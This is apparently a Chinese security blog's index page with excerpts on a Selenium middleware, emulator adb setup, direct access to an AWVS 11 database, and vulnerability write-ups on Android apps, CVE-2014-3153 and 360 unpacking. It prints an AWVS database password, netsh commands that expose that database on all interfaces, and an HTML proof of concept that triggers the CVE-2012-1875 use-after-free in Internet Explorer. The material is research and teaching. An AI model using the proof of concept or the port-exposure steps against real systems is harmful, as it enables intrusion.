修改scrapy-selenium支持docker-selenium

scrapy-selenium是一个Scrapy的中间件，用于让Scrapy支持通过selenium driver访问网页。但默认情况下只支持本地的WebDriver。

scrapy-selenium在和selenium的会话管理上相对完善和稳定，所以，派生一个SeleniumMiddleware的子类，重写即可。

class RemoteSeleniumMiddleware(SeleniumMiddleware):

    def __init__(self, command_executor, desired_capabilities):
        self.driver = driver = webdriver.Remote(
            command_executor=command_executor,
            desired_capabilities=desired_capabilities)

    @classmethod
    def from_crawler(cls, crawler):
        command_executor = crawler.settings.get('SELENIUM_COMMAND_EXECUTOR')
        desired_capabilities = crawler.settings.get('SELENIUM_DESIRED_CAPABILITIES')

        middleware = cls(
            command_executor=command_executor,
            desired_capabilities=desired_capabilities,
        )

        crawler.signals.connect(middleware.spider_closed, signals.spider_closed)

        return middleware

class RemoteSeleniumMiddleware(SeleniumMiddleware):

def __init__(self, command_executor, desired_capabilities):

self.driver = driver = webdriver.Remote(

command_executor=command_executor,

desired_capabilities=desired_capabilities)

@classmethod

def from_crawler(cls, crawler):

command_executor = crawler.settings.get('SELENIUM_COMMAND_EXECUTOR')

desired_capabilities = crawler.settings.get('SELENIUM_DESIRED_CAPABILITIES')

middleware = cls(

command_executor=command_executor,

desired_capabilities=desired_capabilities,

)

crawler.signals.connect(middleware.spider_closed, signals.spider_closed)

return middleware

逍遥模拟器adb配置参考

发表评论

最近为了减少一些工作量以及完成自动化的需求，对Android模拟器进行了一些测试。通过测试，逍遥模拟器的性能、兼容性、Xposed稳定性方面满足需求。但默认情况下adb连接略微麻烦。可以进行如下调整解决。

本地adb连接

由于逍遥模拟器自带的adb版本较老，使用platform-tools的adb连接会出现不兼容。因此，复制platform-tools的adb替换即可。替换文件： More

切换VPS服务器记录

发表评论

终于下定决心买一台VPS。原因有两个，一来总是白嫖FlowerCode的服务器，实在不好意思；二来最近三年都在键值成都办公室网管和部门IT的角色，一来二去的折腾，竟感觉还有那么些意思。所以，趁着休假的时机，正好有时机安静的折腾。 More

连接AWVS 11的PostgreSQL数据库

发表评论

最近有些需求，需要在AWVS 11的基础上进行一些自动化，AWVS 11的API接口不能完全满足需求，所以需要直接操作数据库完成。

读取配置文件

配置文件位于C:\ProgramData\Acunetix 11\settings.ini，数据库相关的字段如下：

databases.connections.master.connection.user=wvs
databases.connections.master.connection.host=localhost
databases.connections.master.connection.port=35432
databases.connections.master.connection.db=wvs
databases.connections.master.connection.password=j6qGK0UCYFnD3lkJsC2ZK1DZJqKO0oqi

databases.connections.master.connection.user=wvs

databases.connections.master.connection.host=localhost

databases.connections.master.connection.port=35432

databases.connections.master.connection.db=wvs

databases.connections.master.connection.password=j6qGK0UCYFnD3lkJsC2ZK1DZJqKO0oqi

外部访问PostgreSQL

修改C:\ProgramData\Acunetix 11\db目录下的PostgreSQL配置文件pg_ident.conf和postgresql.conf可以让PostgreSQL外部访问，但升级的时候会出问题。Windows下，使用netsh进行端口转发，并且加入防火墙例外即可：

netsh interface portproxy add v4tov4 listenport=5432 listenaddress=0.0.0.0 connectport=35432 connectaddress=localhost
netsh advfirewall firewall add rule name="Open PostgreSQL port of Acunetix 11" dir=in action=allow protocol=TCP localport=5432

1 2	netsh interface portproxy add v4tov4 listenport=5432 listenaddress=0.0.0.0 connectport=35432 connectaddress=localhost netsh advfirewall firewall add rule name="Open PostgreSQL port of Acunetix 11" dir=in action=allow protocol=TCP localport=5432

QQ拼音for Android v4.9.1 so劫持/感染

发表评论

Intro

QQ拼音for Android v4.9.1的导出组件com.tencent.qqpinyin.voice.DownloadApkService没有对传入的下载地址进行过滤，导致任意文件下载，且没有对传入的文件名进行合法性校验，导致目录遍历。加上其本身Apk的特点，可以使用该组件感染/劫持so文件。
之前没注意QQ拼音已经归属搜狗，2015-04-27提交到了TSRC，告知已转交搜狗。至今漏洞依然存在，但从v4.9.2开始lib目录有所变化，无法感染/劫持。 More

QQ邮箱 for Android <= 4.0.4手势密码绕过

1条回复

漏洞描述

对于一个Android程序来说，没有一个统一的入口，任何导出的Activity都可以作为程序的入口。所以，如果在写程序的时候，没有考虑到每一个入口进入时的状态，就有可能出现逻辑上的漏洞。
比如QQ邮箱的这个，连续启动两次某些Activity就可以绕过手势密码。最初把PoC代码和描述都提交到了TSRC，结果那边回复说这是by design的，之后的沟通不了了之。 More

CVE-2014-3153笔记

3条回复

CVE-2014-3153可以说是相当经典的漏洞，影响范围相当广泛。这实际上是一个Linux内核的Use-After-Free漏洞，利用得当可以转化为任意内核地址写入。Geohot的TowelRoot也利用了这个漏洞，在当时（以及现在）能够Root（或Crash）绝大多数Android设备。由于工作的需要，收集了该漏洞的一些资料，并且对漏洞原理和利用方法进行了一些学习和分析。 More

360加固保ELF脱壳总结

5条回复

Intro

360加固保可以针对ELF和DEX进行保护，360某些产品的ELF文件基本都使用了自家产品进行加壳，而这些正是我们感兴趣的东西。由于文件比较多，为了能够快速的拿到Payload，最近稍微总结了一些较为通用的方法。

大体流程

壳整个流程的目的是解密核心ELF文件到内存中，关键解密的地方有3处，均使用RC4。 More

WIFI万能钥匙Python查询脚本

10条回复

最近声讨WIFI万能钥匙的声音越来越越多。这东西带来的安全性不必多说，但研究这个App还是十分有意思的。

其实在去年10月份左右，Hao Liu就已经把接口分析完毕。当时还没有iOS的非越狱版，Hao Liu猜测到了WIFI万能钥匙团队一定会通过大量的Android用户提供的密码，然后以LBS的形式出现在Apple App Store上。 More

CVE-2012-1875 UAF Analysis

发表评论

Intro

大牛ga1ois在《关于泄漏的艺术》一文中提到CVE-2012-1875是一个可以从脚本层面直接访问的UAF。以前没分析过这种类型的UAF，这两天趁着年后不忙看了一下漏洞成因。

POC

POC来自看雪，按照惯例添加了一些代码方便跟踪整个过程：

<HTML>
<DIV id=testfaild>
  <img id="imgTest">
  <div id="imgTest"></div>
  <input id="4B5F5F4B" onMouseOver="crash();"></input>
</DIV>
<script language="JavaScript">
function crash() {
  Math.atan2(0xbabe, "[*] calling crash...");
  eval("imgTest").src = "";
  Math.atan2(0xbabe, "[*] after set imgTest...");
}
function trigger() {
  var x =document.getElementsByTagName("input");
  Math.atan2(0xbabe, "[*] fireEvent onMouseOver 1st...");
  x[0].fireEvent("onMouseOver");
  Math.atan2(0xbabe, "[*] Before free object...");
  testfaild.innerHTML = testfaild.innerHTML;
  Math.atan2(0xbabe, "[*] After free object...");
  Math.atan2(0xbabe, "[*] fireEvent onMouseOver 2nd...");
  x[0].fireEvent("onMouseOver");
}
trigger();
</script>
</HTML>

<HTML>

</DIV>

function crash() {

Math.atan2(0xbabe, "[*] calling crash...");

eval("imgTest").src = "";

Math.atan2(0xbabe, "[*] after set imgTest...");

}

function trigger() {

var x =document.getElementsByTagName("input");

Math.atan2(0xbabe, "[*] fireEvent onMouseOver 1st...");

x[0].fireEvent("onMouseOver");

Math.atan2(0xbabe, "[*] Before free object...");

testfaild.innerHTML = testfaild.innerHTML;

Math.atan2(0xbabe, "[*] After free object...");

Math.atan2(0xbabe, "[*] fireEvent onMouseOver 2nd...");

x[0].fireEvent("onMouseOver");

}

trigger();

</script>

</HTML>

调试的IE版本：

文件名：mshtml.dll
文件版本：8.00.6001.18702
MD5：D469A0EBA2EF5C6BEE8065B7E3196E5E
SHA1：FD6CB9D197BB58C339DEFE6E2C3B03FB3B62B440

文件版本：8.00.6001.18702

MD5：D469A0EBA2EF5C6BEE8065B7E3196E5E

SHA1：FD6CB9D197BB58C339DEFE6E2C3B03FB3B62B440